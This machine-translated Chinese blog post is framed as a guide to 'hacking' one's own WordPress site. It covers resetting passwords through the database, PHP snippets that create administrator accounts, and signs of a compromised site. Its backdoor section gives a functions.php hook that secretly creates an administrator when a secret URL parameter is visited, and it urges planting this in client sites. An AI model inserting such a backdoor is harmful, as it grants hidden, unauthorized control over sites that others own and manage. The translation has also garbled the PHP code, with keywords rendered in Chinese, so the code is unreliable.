如何入侵WordPress网站,完整指南

如何入侵WordPress网站,完整指南


我们不会容忍,批准或鼓励任何非法或恶意行为!本文的目的是解释如何黑客或重新获得对属于您的WordPress网站的访问权,或者您有权编辑,管理和访问权限。无论您做什么,都可以自己做. 我们对您的行为不承担任何责任。本指南仅用于教育目的.

所描述的方法将帮助您重新获得对该站点的访问权限,即使您不再拥有帐户,但仍需要一些有关该站点的信息,并且它们不会帮助您侵入任何随机的WordPress安装.

在本指南中,我们将向您展示:

  • 如何入侵WordPress网站
  • 如何在WordPress中创建后门
  • 如何通过FTP创建新的用户帐户
  • WordPress网站被黑客入侵的10个迹象

如何入侵WordPress网站,完整指南

您可以帮助自己的情况

如果您处于以下情况之一,我们的方法将帮助您重新获得访问权限:

  • 您忘记了用户名或电子邮件地址
  • 重置密码选项在托管服务器上不起作用
  • 重置密码电子邮件未通过
  • 您不再有权访问该帐户的电子邮件地址
  • 您知道用户名和密码,但组合不起作用

要使用以下所述的方法,您需要 以下仅一项

  • 通过FTP访问服务器,或
  • cPanel访问服务器,或
  • 访问MySQL数据库以及远程连接数据库的能力

方法1 – MySQL方式

使用此方法可以更改现有用户的密码(或用户名,如果需要)或创建新帐户。您需要cPanel访问权限或直接MySQL访问该站点的数据库. 让我们从更改现有用户的密码开始.

如果您使用的是cPanel,请登录(cPanel始终可以通过 https://yoursite.com:2083 链接),找到并打开phpMyAdmin. 数据库和表的列表在左侧. 您正在寻找结尾为 _用户. 可能是 wp_users, 但是,如果服务器上安装了多个WordPress站点,则必须找到正确的站点.

右表中将包含您要编辑的用户。如果您通过某些外部客户端(例如, SQLyog的. 找到表格和实际的用户记录后,就该更改密码了.

您可能已经知道,密码已保存在 user_pass 字段,使用MD5算法进行哈希处理。打开 在线MD5生成器 输入您要使用的密码,然后单击“哈希”. 复制生成的字符串并替换原始密码 用它。在phpMyAdmin中,您可以双击该字段来进行编辑。其他MySQL客户端中的过程与此类似。保存更改并使用新密码登录WordPress.

WP用户表

用户名,哈希密码和电子邮件存储在 wp_users 数据库表

仍然是方法1 –创建新用户

创建新用户稍微复杂一点,但是仍然可以在不到一分钟的时间内进行管理. 建立新纪录 在用户表中并填充:user_login,user_pass(使用上述MD5函数哈希化)和user_email。所有其他字段可以保留为空;没关系。保存新记录。保存后,MySQL将为其赋予唯一的ID。是ID字段中的数字。记住它.

现在去 _usermeta 表。记得, 该表的前缀必须与用户的前缀相同. 例如 wp_users 和 wp_usersmeta. 如果前缀不相同,则说明您编辑的表错误(安装了某些其他WP的表),因此新帐户无法使用。我们将创建两个新记录。忽略 umeta_id 他们两个的领域。组 用户身份 字段到您刚刚记住的值(“用户”表中的新ID值)。对于第一个记录集 meta_key 至 wpct_user_level 和 meta_value 至 10. 对于第二个 meta_key 至 wpct_capabilities 和 meta_value 至 a:1:{s:13:“管理员”; b:1;}. 都保存。完成–登录!

方法2 – functions.php方法

通过cPanel编辑functions.php或使用FTP客户端可以使用此方法。如果使用cPanel,请找到“文件管理器”并将其打开. 首先,我们必须找到活动主题的文件夹.

去 public_html / wp_content / themes 夹。如果您立即看到主题并知道是哪个主题,那就太好了。打开其文件夹并开始编辑 functions.php. 如果没有,请打开该站点,右键单击任何地方,选择“查看源代码”。然后按Ctrl + F并开始输入 /主题/ 很快您就会看到很多URL突出显示,并且您会识别出活动主题的文件夹名称.

在文件结构中找到它,打开并开始编辑 functions.php. 在文件末尾复制/粘贴以下代码. 注意结束 ?> PHP标签(如果有). 他们必须在最后一行。所以在他们之前插入代码.

$ new_user_email ='[email protected]';
$ new_user_password ='12345';

if(!username_exists($ new_user_email)){
$ user_id = wp_create_user($ new_user_email,$ new_user_password,$ new_user_email);

wp_update_user(array('ID'=> $ user_id,'nickname'=> $ new_user_email));

$ user =新的WP_User($ user_id);
$ user-> set_role('administrator');
}

仅编辑代码的前两行以反映您的新帐户. 如果WP中已有该电子邮件的用户,则不会创建一个新帐户,因此请确保该帐户是新帐户. 也请更改密码-不要被脚本小子入侵。保存文件后,只需打开您的站点,代码将运行,并创建一个具有管理员权限的新帐户,您将可以使用该帐户登录.

这样做后,请记住从中删除代码 functions.php.

其他黑客手段

知道FTP,cPanel或MySQL密码后,即表示您具有对服务器的合法访问权,因此也应有权访问WordPress安装。如果您没有任何这些帐户,那么您就无能为力(入侵他人网站),那就不好了!

请记住,未经授权访问任何计算机,站点或服务器是严重的罪行,在大多数国家/地区都应立即予以处理。.

如果您担心自己的WordPress网站可能被黑客入侵,请使用免费的WordPress安全扫描器检查此页面。如果您没有时间设置博客,请让我们为您做.

如何在WordPress中创建后门

当前门关闭时,您可以尝试后门。这听起来像是一种使用代码进入网站但无法访问它的恶意方式,但是实际上有时您需要控制自己的网站(如果有人偷了它).

如果它是为他人创建网站,那么您迟早会有一个拒绝为您的工作付款的客户;客户将删除您的登录信息,并接管您所做的一切。有时,通过FTP创建新用户或重置密码就足够了。当那还不够的时候, 您可能想破解自己的方式或创建对管理页面的后门访问.

但是,如果您决定在WordPress环境中隐藏一小段代码,则可能会节省一些尊严,并且 以管理员权限访问WordPress网站. 那就是游戏开始的地方.

无论这个小偷在您可能拥有的服务器上删除您的信息或将备份还原多少次,都有可能他对后门入口一无所知。如果他这样做了,他可能甚至不需要您的帮助来设置WordPress,对吧?

创建一个后门:

好,说的够了。这是完成工作所需的一段代码:

  1. 打开functions.php文件
  2. 复制/粘贴以下代码:
  3. add_action('wp_head','wploop_backdoor');
    函数wploop_backdoor(){
    如果($ _GET ['backdoor'] =='knockknock'){
    require('wp-includes / registration.php');
    如果(!username_exists('username')){
    $ user_id = wp_create_user('name','pass');
    $ user =新的WP_User($ user_id);
    $ user-> set_role('administrator');
    }
    }
    }
    ?>
  4. 保存更改

如果您将代码保留原样,则在站点上创建新管理员所需要做的就是访问 http://www.yourdomain.com/?backdoor=knockknock

页面加载后,您的新用户名是 “名称” 和密码 “通过”.

当然, 您可以在代码中进行更改 通过更改“名称”和“通过” 随心所欲您还可以通过将“后门”和/或“敲门”更改为您想出的任何东西来更改到后门的链接.

尝试使用该功能-不仅有趣,而且在将来要为完全不信任的人创建网站时,它确实可以为您提供帮助。您还应该升级WordPress和博客技能.

如何通过FTP创建新的用户帐户

在WordPress上创建新的用户帐户非常容易。作为管理员,您需要 导航到“用户管理”页面 您可以在其中为任何用户角色创建新帐户。只需几秒钟即可完成,新创建的用户可以立即使用给定的用户名和密码登录.

但是,如果您失去对WordPress管理员的访问权限,会发生什么?事情可能会变得有些复杂,但请放心–我们为您提供了一个可以节省管理员生命的功能.

无论是另一个管理员删除了您的帐户,还是错误地从数据库中删除了所有用户,是否使用了功能异常的插件或被黑,您仍然可以重新控制。有时,您可能只能访问FTP服务器,而HTTP服务器将无法访问,您将需要创建一个新的管理员。虽然这可能很少见,但以下功能可为您节省.

在WordPress管理环境之外创建新帐户, 您只需要通过FTP访问您的站点即可。作为管理员,您应该具有登录服务器所需的所有信息,并且可以通过在主题中创建新功能来快速创建新帐户。.

通过FTP创建新的用户帐户:

  1. 打开FTP客户端并连接到您的帐户
  2. 导航到wp内容/主题
  3. 打开您正在使用的主题的文件夹
  4. 搜索functions.php文件并进行编辑
  5. 复制并粘贴以下功能:
  6. 函数admin_account(){
    $ user ='用户名';
    $ pass ='密码';
    $ email ='[email protected]';
    如果(!username_exists($ user)&&!email_exists($ email)){
    $ user_id = wp_create_user($ user,$ pass,$ email);
    $ user =新的WP_User($ user_id);
    $ user-> set_role('administrator');
    }}
    add_action('init','admin_account');
    
  7. 将用户名,密码和电子邮件更改为唯一的名称
  8. 保存更改

确保您在功能中设置的用户名,密码和电子邮件地址是唯一的 否则,该功能将无法正常工作。保存更改后,就可以完成操作,并可以导航到WP登录面板。使用新信息重新登录,并在验证帐户后,可以从functions.php文件中删除该功能。.

上面显示的功能创建了一个管理员帐户,但是您可以轻松地对其进行修改,以创建具有任何其他用户角色的帐户。只是 改变角色上的8 行 代码给编辑者,作者,贡献者,订阅者或您创建的任何其他用户角色.

不幸的是,如果您丢失了管理员帐户,那么您也丢失了使用该用户名撰写的所有帖子。这就是为什么您应该始终保留可以轻松检索的备份的原因。如果您拥有管理员帐户时正在阅读此书, 以此提醒您立即创建备份 并为本文添加书签,以防万一您将来需要在WordPress之外创建帐户.

WordPress网站被黑客入侵的10个迹象

WordPress是一个巨大的博客平台。有数以百万计的用户,而且这个数字似乎每天都在迅速增长。人们甚至倾向于比您想象的更频繁地将在其他内容管理系统中创建的网站转移到此开源系统中。而且,虽然这很好,但这意味着 试图入侵随机网站时,黑客还将WordPress排在第一位.

通常,如果您被黑客入侵,就会立即知道。您的站点将无法访问;您将无法登录,有时黑客甚至会在首页上留下一条消息。但是更多时候, 您甚至可能没有注意到某些变化. 在本文的这一部分中,我们将向您展示一些迹象,这些迹象可能表明您的WordPress网站遭到了黑客入侵,以及针对该问题的一些解决方案.

1.登录失败

这个迹象非常明显。如果您使用用户名和密码组合已经有一段时间了,但从未遇到麻烦,如果WordPress突然无法识别您的帐户,您可能会感到怀疑. 如果黑客必须登录到您的网站,则很可能他会迅速更改您的管理员权限.

也许他需要更改您的密码或完全删除了您的帐户。在第一次WordPress告诉您有关用户名/密码不正确的消息后,您开始感到恐慌之前,请考虑以下事实:您可能输入了错误的密码或者您打开了大写锁定按钮.

:尝试通过电子邮件恢复密码或使用其他帐户重新登录。为确保登录安全,建议您安装 登录忍者 WordPress插件.

2.恶意内容已添加到您的网站

网站包含恶意软件警告

如果您开始注意到站点上不熟悉的内容,则可能会开始担心。当他们有机会访问您的管理区域时, 黑客将能够更改您的核心以及主题和插件文件. 这意味着他们可以改变他们想要的任何东西.

尽管某些黑客会彻底修改您网站的外观,甚至可能说明您被黑客入侵,但其他黑客对此会更加微妙。.

:尝试在网站代码中寻找隐藏的内容。您的网站页脚中可能存在指向黑客的恶意网站的链接,或者他们可能安装了会定期向您的客户开放的弹出窗口。使用“安全忍者”扫描您的网站或连续监视您的网站是否存在此类问题.

3.可疑访问

如果您不跟踪网站,则应立即开始。一种简单的方法是使用Google Analytics(分析),该功能包括许多其他功能,可以告诉您获得了多少次访问以及这些访问来自何处。一段时间后,您将了解您的网站。也就是说,您将知道访问来自何处,何时启动新的广告系列以及何时发布了新的促销链接。.

但是,如果您突然发现自己的网站正从可疑域获得大量新访问,, 您将需要对此进行进一步调查,因为您的网站可能刚刚被黑了。通常,这种访问会导致100%的跳出率,这意味着只能访问一页。黑客会经常使用自动系统,这些系统会将其他不良站点引向您的站点。无论是在您的网站上执行的错误代码,还是您已经成为垃圾邮件网络的一部分,情况都可能变得很严重,因此您必须检查网站是否存在恶意代码.

解: 采用 Google网站管理员工具 查找可疑域

4.流量突然下降

安全浏览站点状态

与最后提到的被黑客入侵的迹象不同,该迹象可能会提醒您,因为访问次数突然减少。而不是向您介绍新的访问, 骇客可能会将造访次数从您的网站上移开. 发生这种情况的原因是,黑客将您的网站重定向到了另一个网站。获得较少访问者的另一个原因是Google将您的网站列入了黑名单。此操作将向所有可能因为您的网站被感染而选择不打开您的网站的用户显示一条消息.

:使用Google的 安全浏览网站状态 检查您的网站是否标记为不安全并且当前存在访问危险.

5.搜索引擎结果很奇怪

如果您没有注意到网站上的任何更改,但是您确实发现Google和其他搜索引擎中的搜索结果很奇怪(显示不同的标题和其他元数据),则可能是网站被黑客入侵的明显迹象。黑客可能以仅对专家可见的方式更改了您的内容。尽管如此,更改仍将在搜索引擎结果中显示.

:用检查您的网站 Google网站管理员工具, 并检查您的网站是否为此被黑客入侵 免费的在线工具.

6.您无法发送/接收电子邮件

黑客访问您的网站后,他可能会希望 使用您的服务器向其他人发送垃圾邮件. 当您发现自己无法从WordPress发送或接收新电子邮件时,这可能是您被黑客入侵的明显标志。再次检查您的电子邮件,然后与您的提供商联系以确保没有任何错误.

:测试您的WordPress 邮件功能 这个免费的插件.

7.网站不存在

找不到服务器

有时候,黑客不会访问您的网站来植入恶意代码,重定向用户或使用您的电子邮件发送垃圾邮件。有时, 他们要做的就是崩溃您的网站. 很少有黑客会成功地从整个服务器中删除所有内容。因此,重要的是,您必须在一家知名的托管公司托管文件,这将确保安全,并每天或至少每周保存一次网站备份。最好还是不时进行备份,以便快速恢复网站。.

:在WordPress中安装用于备份管理的最佳插件之一.

8.可疑文件

类似于可能添加到现有文件中的恶意内容, 黑客可能会在根文件夹中的任何位置植入额外的文件. 了解WordPress的方法是一件好事,但是如果您没有这方面的经验,则应该使用安全工具来检查所有文件和活动。最近,我们审查了安全忍者,这是检查您所有WordPress文件的理想工具.

:尝试查找不属于您的WordPress安装的文件。使用“安全忍者”定期扫描您的站点并自动查找这些文件。然后删除文件或从受感染的文件中删除恶意代码。不要忘记安全忍者的Core Scanner附加组件.

9.新成员

根据您的站点,您可能是唯一能够添加新成员的人。在这种情况下,告诉您有关新注册用户的电子邮件可能会触发警报。如果还有其他管理员可以添加新成员,请与他们联系以检查可疑活动.

:使用免费插件更改登录URL,使用.htpasswd文件限制对WordPress登录页面的访问,并始终使用登录忍者来保护您的登录表单.

10.检出服务器上的预定事件

有时,黑客一旦找到进入的路,就不会对您的网站做任何事情。, 他们将离开预定的活动 将来可能会损害您的网站。这种技术很危险,因为黑客一开始可能会让无经验的受害者毫无头绪。您可能被感染,对此一无所知.

:在使用的服务器上检查CRON作业,并确保没有可疑的计划任务.

包起来

我们希望本文将帮助您甚至管理更安全的WordPress网站,并希望它能帮助您在不良情况下重新获得对其的访问。和 即使您的网站整洁,也请不要将其视为理所当然.
始终确保您的博客尽可能安全。我们建议使用WordPress的安全性插件,这些插件最多可以为您节省时间。尽管如此,请不要成为使用不安全密码的人,并且在侵入您自己的WordPress网站时要小心.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map